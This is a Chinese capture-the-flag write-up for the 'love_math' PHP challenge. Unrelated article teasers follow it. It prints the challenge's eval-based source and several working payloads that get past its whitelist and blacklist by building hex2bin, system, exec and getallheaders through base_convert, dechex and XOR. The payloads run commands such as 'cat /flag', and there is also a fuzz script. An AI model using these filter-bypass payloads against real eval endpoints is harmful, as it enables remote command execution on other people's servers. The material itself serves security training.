[CTF]攻防世界:love_math-Seo优化-塔城地区网站建设公司

题目：[CTF]攻防世界:love_math

学习点：php的动态函数、默认函数名使用

<?phperror_reporting(0);//听说你很喜欢数学，不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){show_source(__FILE__);}else{//例子 c=20-1$content=$_GET['c'];if(strlen($content)>=80){die("太长了不会算");}$blacklist=[' ','\t','\r','\n','\'','"','`','\[','\]'];foreach($blacklistas$blackitem){if(preg_match('/'.$blackitem.'/m',$content)){die("请不要输入奇奇怪怪的字符");}}//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp$whitelist=['abs','acos','acosh','asin','asinh','atan2','atan','atanh','base_convert','bindec','ceil','cos','cosh','decbin','dechex','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/',$content,$used_funcs);foreach($used_funcs[0]as$func){if(!in_array($func,$whitelist)){die("请不要输入奇奇怪怪的函数");}}//帮你算出答案eval('echo '.$content.';');}

给出源代码，让你构造出方法来拿到flag，看到白名单和黑名单及字符80长度限制。

步骤

1、长度太短，考虑用**$_GET[x]**。

$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];

[ ] 方括号被过滤，可以用{}尖括号代替。但是GET必须大写。

其中源代码中白名单函数可以利用的应该是base_convert函数，可以进行进制转换。

2、接下来考虑构造出$_GET[x]

现有：dechex （十进制转16进制）还需要一个 16进制转ascii （hex2bin）
通过base_convert十进制到36进制转换，得到hex2bin。

总的payload：http://61.147.171.35:65356/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=ls
解释：

base_convert(37907361743,10,36) => “hex2bin”
dechex(1598506324) => “5f474554” => hex2bin(5f474554) => _GET
$pi=_GET;
($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs} //{}可以代替[]

ascii 转 16

16进制转10

3、执行命令拿到flag

其实还有许多中方法，以下参考学习：

1、

$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})base_convert(696468,10,36)=>"exec"$pi(8768397090111664438,10,30)=>"getallheaders"exec(getallheaders(){1})//操作xx和yy，中间用逗号隔开，echo都能输出echo xx,yy

2、

//exec('hex2bin(dechex(109270211257898))') => exec('cat f*')($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))//system('cat'.dechex(16)^asinh^pi) => system('cat *')base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))

3、fuzz

<?php $payload=['abs','acos','acosh','asin','asinh','atan2','atan','atanh','bindec','ceil','cos','cosh','decbin','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];for($k=1;$k<=sizeof($payload);$k++){for($i=0;$i<9;$i++){for($j=0;$j<=9;$j++){$exp=$payload[$k]^$i.$j;echo($payload[$k]."^$i$j"."==>$exp");echo"<br />";}}}http://XXX/?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

语音转写技术在专业服务领域的应用实践

作为专业服务从业者，高效的信息记录与处理能力直接影响工作质量。以留学咨询行业为例，日常需要处理大量语音交流内容，传统手工记录方式不仅效率低下，还容易遗漏关键信息。本文将结合技术实现原理，探讨语音转写工具在专…

李华

Cartographer SLAM系统实战指南：从零构建智能地图

Cartographer SLAM系统实战指南：从零构建智能地图【免费下载链接】cartographer 项目地址: https://gitcode.com/gh_mirrors/car/cartographer 在机器人技术和自动驾驶领域，精准的环境感知与定位是核心技术挑战。Cartographer作为谷歌开源的SLA…

李华

LangChain实战快速入门笔记（三）--LangChain使用之Chains

LangChain实战快速入门笔记（三）–LangChain使用之Chains 文章目录LangChain实战快速入门笔记（三）--LangChain使用之Chains一、Chains的基本使用1.Chain的基本概念2.LCEL 及其基本构成3.Runnable3.1 为什么需要统一调用方式&#x…

李华

Live Charts终极指南：免费打造专业级数据可视化应用

Live Charts终极指南：免费打造专业级数据可视化应用【免费下载链接】Live-Charts 项目地址: https://gitcode.com/gh_mirrors/liv/Live-Charts 想要为你的.NET应用添加引人注目的图表功能吗？Live Charts数据可视化库正是你需要的解决方案。这个…

李华

ROCm平台深度学习模型训练完整实践：从环境配置到性能优化终极指南

ROCm平台深度学习模型训练完整实践：从环境配置到性能优化终极指南【免费下载链接】ROCm AMD ROCm™ Software - GitHub Home 项目地址: https://gitcode.com/GitHub_Trending/ro/ROCm ROCm（Radeon Open Compute Platform）作为AMD开源…

李华

3大核心技术突破：如何解决大模型训练中的内存效率瓶颈

3大核心技术突破：如何解决大模型训练中的内存效率瓶颈【免费下载链接】DeepSeek-V3 项目地址: https://gitcode.com/GitHub_Trending/de/DeepSeek-V3 当你在训练百亿参数级别的大模型时，是否经常遇到这样的困境：GPU内存频繁溢出&…

李华